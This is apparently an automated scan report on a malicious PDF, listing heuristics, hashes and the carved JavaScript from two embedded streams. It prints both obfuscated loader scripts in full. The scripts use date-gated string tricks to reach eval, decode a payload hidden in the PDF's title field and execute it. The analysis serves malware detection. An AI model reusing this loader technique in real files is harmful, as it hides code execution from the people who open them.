Verdict: MALICIOUS
Risk Score: 116

Malware Insights

MITRE ATT&CK: T1059.001 PowerShell
The PDF file contains embedded JavaScript streams, indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The use of String.fromCharCode in the document body and embedded scripts suggests obfuscation, a common technique for hiding malicious code. The JavaScript is likely intended to download and execute a second-stage payload, although the specific URLs or actions are not directly extractable from the provided evidence. The file's creation date and authoring application also appear unusual.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9998

Heuristics (4)
- JavaScript action (low; 2 related findings) PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical) PDF_JS_EXPLOIT_CLUSTER: PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: `/Producer (String.fromCharCode)`
- Embedded JS stream (low) PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| javascript_obj0001_000.js | pdf-javascript-stream | PDF /JS object 1 at offset 0xA | 568 bytes | f5b892d57b182d12aea55788f169efa54493c2aacf8e5c149c762c7df2605281 |
| javascript_obj0003_001.js | pdf-javascript-stream | PDF /JS object 3 at offset 0x301 | 564 bytes | 2db3aa8399fb863f689a71eadbe4c3ea890e17a008873d32d7696728fabf2795 |

javascript_obj0001_000.js

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script; the comments are analyst annotations and are not part of the carved file)

```javascript
var date = new Date();
ybdkq='';
var q = date.getFullYear()-2007;                        // computed but never used
evo='2011s'.replace(date.getFullYear(),'hi');           // 'his' only while the clock reads 2011; in any other year nothing is replaced and the decoder below never resolves (expiry / analysis-evasion gate)
bsbup=('tit2011').replace(date.getFullYear(),'le');     // 'title'
g=new Function('a','return t'+evo+'[a]');               // body becomes 'return this[a]': reads a document property by name
var hpvo = g(bsbup);                                    // this.title
eiqai=('sub2011').replace(date.getFullYear(),'ject');   // 'subject'
var hcmo=g(eiqai).replace(date.getFullYear(),'al');     // this.subject with '2011' swapped for 'al' (presumably yields the name 'eval')
vvxn=g(hcmo);                                           // resolves that name to the eval function
nxeh='pro2011cer';
nxeh=vvxn('nxeh.replace(date.getFullYear(),"du")');     // 'producer'
fhq=vvxn(g(nxeh));                                      // eval(this.producer): the /Producer field holds "String.fromCharCode" (see matched heuristic line)
kkif = vvxn(hpvo);                                      // eval(this.title): the title field presumably carries the encoded payload as character codes
for (i = 0; i < kkif.length; i++) {
vlpbt = kkif[i];
ybdkq += fhq(vlpbt);                                    // rebuild the payload string one character at a time
}
vvxn(ybdkq);                                            // eval the decoded second stage
```

javascript_obj0003_001.js

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token(s))

Preview script (first 1,000 lines of the extracted script; the same decoder as object 1 with renamed identifiers)

```javascript
var date = new Date();
tnzmp='';
var q = date.getFullYear()-2007;
zlu='2011s'.replace(date.getFullYear(),'hi');
car=('tit2011').replace(date.getFullYear(),'le');
g=new Function('a','return t'+zlu+'[a]');
var qnsl = g(car);
cyw=('sub2011').replace(date.getFullYear(),'ject');
var vbrq=g(cyw).replace(date.getFullYear(),'al');
yxup=g(vbrq);
morzt='pro2011cer';
morzt=yxup('morzt.replace(date.getFullYear(),"du")');
wzz=yxup(g(morzt));
vzgb = yxup(qnsl);
for (i = 0; i < vzgb.length; i++) {
iowds = vzgb[i];
tnzmp += wzz(iowds);
}
yxup(tnzmp);
```